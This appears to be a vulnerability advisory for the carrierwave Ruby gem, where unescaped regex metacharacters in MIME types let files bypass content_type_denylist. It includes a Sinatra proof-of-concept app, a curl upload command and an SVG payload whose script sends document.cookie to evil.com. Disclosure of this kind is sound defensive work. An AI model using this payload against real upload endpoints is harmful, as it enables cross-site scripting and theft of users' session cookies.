Improper Encoding or Escaping of Output Affecting carrierwave package, versions <2.2.7>=3.0.0.beta, <3.1.3

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output that allows bypassing of the content_type_denylist in the denylisted_content_type? function. An attacker can upload files with MIME types containing unescaped regex metacharacters, including the + in image/svg+xml or application/xhtml+xml, which are not properly matched against the denylist due to lack of escaping and anchoring. This allows unexpected content types to be processed, which can be used for cross-site scripting.

app.rb
require "sinatra"
require "carrierwave"
require "fileutils"

FileUtils.mkdir_p("uploads/files")

CarrierWave.configure do |config|
  config.root      = File.expand_path("uploads")
  config.store_dir = "files"
end

class VaultUploader < CarrierWave::Uploader::Base
  storage :file
  def store_dir = "files"
  def content_type_denylist = %w[image/svg+xml]
end

post "/upload" do
  content_type :json
  san = CarrierWave::SanitizedFile.new(
    tempfile:     params[:file][:tempfile],
    filename:     params[:file][:filename],
    content_type: params[:file][:type]
  )
  uploader = VaultUploader.new
  begin
    uploader.store!(san)
    { result: "VULNERABLE", message: "SVG bypassed denylist", path: uploader.path }.to_json
  rescue CarrierWave::IntegrityError => e
    { result: "blocked", message: e.message }.to_json
  end
end

bundle exec ruby app.rb &

echo '<svg xmlns="http://www.w3.org/2000/svg"><script>document.location="https://evil.com/?c="+document.cookie</script></svg>' > xss.svg

curl -X POST http://localhost:4567/upload \
  -F "file=@xss.svg;type=image/svg+xml"

• GitHub Advisory
• GitHub Commit